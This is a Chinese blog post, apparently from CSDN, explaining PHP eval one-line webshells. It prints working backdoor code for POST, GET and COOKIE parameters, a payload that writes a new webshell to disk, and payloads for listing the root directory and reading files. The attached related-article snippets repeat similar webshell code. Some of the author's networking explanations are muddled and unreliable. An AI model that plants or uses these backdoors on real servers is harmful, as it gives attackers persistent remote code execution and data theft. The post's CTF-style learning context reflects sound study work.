eval一句话的简单理解

最新推荐文章于 2023-08-28 01:12:14 发布
最新推荐文章于 2023-08-28 01:12:14 发布
阅读量1.3k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 笔记 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_46203060/article/details/116404017

对eval类型的一句话的见解

一,$_POST

1概述

POST是一种取数据的方式。请求开始后,浏览器要向服务器额外发送一些数据,例如cookie、用户名、密码等等,这些数据不体现在URL上,发送完毕后服务器再将数据(网页)传送给浏览器。
(下述为个人理解)
通过该方法传递,简单来说就是用传递的参数构建连接,一旦主动调用后,参数将传递至服务器,且服务器响应200,就建立了TCP/UDP连接,可以通过链接直接进行shell管理。

2常见格式

<?php @eval($_POST['content']);?>
//说明 @和'可以省略,@可以忽略报错,content随意

3使用方式

直接使用shell管理工具连接即可,例如:蚁剑、菜刀、冰蝎等。具体过程就不演示了。

二,$_GET

1概述

GET表示浏览器从服务器取数据的方式,并且在此期间浏览器不向服务器发送任何的数据,所有数据均体现在URL当中。
(下述为个人理解)
由于此方法主动调用之后不会立即向服务器发送数据,而是交由服务器处理后,返回结果,所以没有机会建立双向链接,故无法使用shell管理工具连接。

2常见格式

<?php @eval($_GET['content']);?>
//说明 @可以省略-@可以忽略报错,'不可省略-不然无法,content随意

3使用方法

利用bp抓包,进行重放攻击,利用参数传递php函数执行命令获取服务器相关信息。这就意味着需要收集相关的姿势了,下面收集了一些常见姿势。

(1)查看信息

phpinfo();

(2)写入一句话

$myfile = fopen("1.php", "w");fwrite($myfile,"<?php @eval(\$_POST[a]);?>");

(3)glob:///查看根目录

$a = new DirectoryIterator("glob:///*"); foreach($a as $f){echo($f->__toString());}

(4)查看指定文件内容

var_dump(file_get_contents("flag.txt"));//引号内需要加路径,如果是当前路径则直接填文件名。

4举例

一般来说,下图为GET形使用的常见方式。
在这里插入图片描述

三,$_COOKIE

1概述

$_COOKIE需要配合setcookie()使用,即通过PHP设置cookie的方式(其实其他语言也可以设置cookie,例如:js)时,需要该方法和函数配合使用。
该方法是用来获取通过setcookie()定义的指定cookie键的值。
该方法主要需要绕过或者伪造。

2举例

<?php
    error_reporting(0);
    highlight_file(__FILE__);
    setcookie("user",1);
    $user=$_COOKIE['user'];//获取cookie(也就是$a)的值
    if ($user==='admin'){
        eval($_POST['a']);
    }
?>

连接方式
在这里插入图片描述

在这里插入图片描述确认即可。

四,总结

http协议的八种方式Php都支持,既然支持,理论上就一定会有相应的eval一句话写法,这里收录了三种方法的eval一句话。(其实身为初学者的我是近期才总结的,所以知道的姿势少而且不精,望各位大佬多多指教。)

php eval句话木马干啥的,eval函数简介与PHP句话木马剖析
weixin_32743045的博客
03-09 1474
eval函数简介与PHP句话木马剖析大家好我是Carol,我的QQ是:906871417eval函数1.eval()函数把字符串按照PHP代码来计算。2.该字符串必须是合法的PHP代码,且必须以分号结尾。3.如果没有在代码字符串中调用return语句,则返回NULL。如果代码中存在解析错误,则eval()函数返回false。二:eval函数的般用法$string="beautiful"...
Web安全:句话木马
cldimd的博客
09-11 5634
概述 在很多的渗透过程中,渗透人员会上传句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么句话木马到底是什么呢? 先来看看最简单句话木马: <?php @eval($_POST['attack']) ?> 【基本原理】利用文件上传漏洞,往目标网站中上传句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括
Eval句话***原理详解
weixin_34362991的博客
01-12 582
<%eval request("#")%> 我们来解释下它的原理. 首先是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行,后面的 eval句话***的精华部分,使用 eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了Request.form('#')+''这句代 码,...
eval函数简介与PHP句话木马剖析
对代码不满足,是任何真正有天才的程序员的根本特征。
01-29 2万+
eval函数简介与PHP句话木马剖析    大家好我是Carol,我的QQ是:906871417 eval函数 二:eval函数的般用法 三:eval函数的特殊用法 四:php句话挂马的原理 五:禁用eval函数   eval函数 1.eval() 函数把字符串按照 PHP 代码来计算。 2.该
php 句话 eval禁用,linux环境安装Suhosin禁用eval函数防句话木马教程
weixin_35361584的博客
03-17 925
大多数句话木马通过eval函数进行植入,如果能禁用掉eval函数,可以进步加固服务器安全。而eval函数是无法通过php.ini直接禁用的,需要安装Suhosin扩展进行禁用。以下教程适用于php5.4版本(以下操作建议由专业运维人员操作)因为宝塔后台没有内置这个插件,所以我们需要连接服务器,通过命令行安装,首先链接登录服务器。然后按下步骤操作。1、下载扩展源码(有些扩展版本需要与PHP版本...
eval
[暂停使用]任先阳
02-18 342
因为各种规范都不推荐用,所以没仔细看过 返回值 ,行为和逗号操作符很相像,看个例子,就差不多了。 const log = console.log; let x = null,str = null; str = "x=10;"; log(eval(str)); // 10 str = "x=10;(function(){})();"; log(eval(str)); // undefin...
Eval句话asp连接
11-10
Eval句话ASP连接详解】 在ASP(Active Server Pages)编程中,`Eval`函数是个非常重要的功能,它允许开发者执行字符串中的VBScript代码。标题"Eval句话asp连接"中的"句话"通常指的是简短的、能够完成特定...
句话木马要点和防范注意事项
05-24
首先,我们要理解句话木马的工作原理。句话木马通常是基于PHP、ASP、JSP等服务器端脚本语言编写的,它们利用了这些语言的特性,如命令执行、文件包含、变量注入等漏洞,使得攻击者可以在服务器上执行任意命令。...
asp句话.zip
06-28
在ASP技术中,“句话木马”通常指的是利用ASP漏洞植入的极简版后门程序,这种后门可以让攻击者通过简单的HTTP请求控制服务器。"asp句话.zip"这个文件可能包含了个或多个这样的后门示例。 1. ASP基础: ASP是...
php eval()句话木马
最新发布
01-08
### 关于PHP `eval()` 函数用于创建句话木马的理解 `eval()` 是 PHP 中的个内置函数,允许执行作为字符串传递的代码。由于其灵活性,该功能常被恶意利用来构建所谓的“句话木马”。这些小型脚本可以嵌入到...
句话木马@eval($_POST[“cmd“]);是什么意思(超详细)
qq_62708558的博客
02-20 2万+
再加上eval()方法函数将用户输入的字符串进行执行,那么用户便可以通过输入php语句来达到任意操作数据库和服务器的效果了
PHP 句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示
热门推荐
百彦子烨的博客
11-10 3万+
该文章对PHP句话木马 @eval($_POST['hack']); 语句进行了详细解析并进行了简单的靶机演示该木马利用操作
[shell] $@ 与 eval
weixin_43742643的博客
08-28 445
@的用法以及与$*的区别可以参考测试脚本如下般情况下,我们可能会这样执行脚本输出如下,可见"$*"会把所有的参数包裹在单引号里作为个完整的参数,这样bash -c才能正常运行。然后我们这样执行次脚本输出如下,可以看出只有"$@"可以保证参数的致性。如果这个脚本继续调用其他脚本,并切希望把参数继续传递下去,那么最好使用。
eval php post中国菜刀,技术剖析中国菜刀之系列二
weixin_30781905的博客
04-15 645
在第部分的菜刀系列剖析里面,已经介绍了“中国菜刀”的易用界面以及些高级特性。——其中最令人注目的,莫过于其作为web shell的大小,aspx版仅有73字节,在硬盘中才4k。而在这部分里,Fireeye详细介绍“中国菜刀”平台适用性、上传机制、通讯模式以及如何侦测,至于中国菜刀直在争论的个话题,有没有后门,各位看官儿,您看了就知道了。平台:web服务器平台——JSP, ASP, ASPX...
eval用法介绍
Akony的博客
07-05 870
eval() 函数可计算某个字符串,并执行其中的的 JavaScript 代码。var a=1 var b='a' eval(b) //output 1 var a_b = 2 eval(b+'_b') //output 2 eval("1+2") //output 3避免在不必要的情况下使用eval eval() 是个危险的函数, 他执行的代码拥有着执行者的权利。
php eval post value,下列哪个为php句话木马的代码?、 答案:<?php @eval($_POST[chopper]);?>...
weixin_39986027的博客
03-17 859
http / / image口.zhihuishu.com / / / / zh onlineexam ueditor 201811 0e5e20e13df442f3ad3c2876e5fb47c4.png答71:http / / image口.zhihuishu.com / / / / zh onlineexam ueditor 201811 97feba4a029d4e12808f145e2d...
eval的作用(非常重要)
十月鱼的博客(本博客不再更新,作者迁移至:http://wiki.51centos.com)
06-12 3683
、场景 eval会对后面的cmdLine进行两遍扫描,如果第遍扫描后,cmdLine是个普通命令,则执行此命令;如果cmdLine中含有变量的间接引用,则保证间接引用的语义。 我不止次遇到过这种问题。在shell给mysql传参,在shell给python传参,shell给数组传参。 区别就是在些场景无伤大雅,些场景就读不出这个值就无法执行下去。mysql -e传参就是这个情况。e...
linux之eval用法
yi412的专栏
07-03 773
linux之eval用法 转自:http://www.cnblogs.com/huzhiwei/archive/2012/03/14/2395956.html shell中的eval 功能说明:重新运算求出参数的内容。 语  法:eval [参数] 补充说明:eval可读取连串的参数,然后再依参数本身的特性来执行。 参  数:参数不限数目,彼此之间用分号分开。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

这周末在做梦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值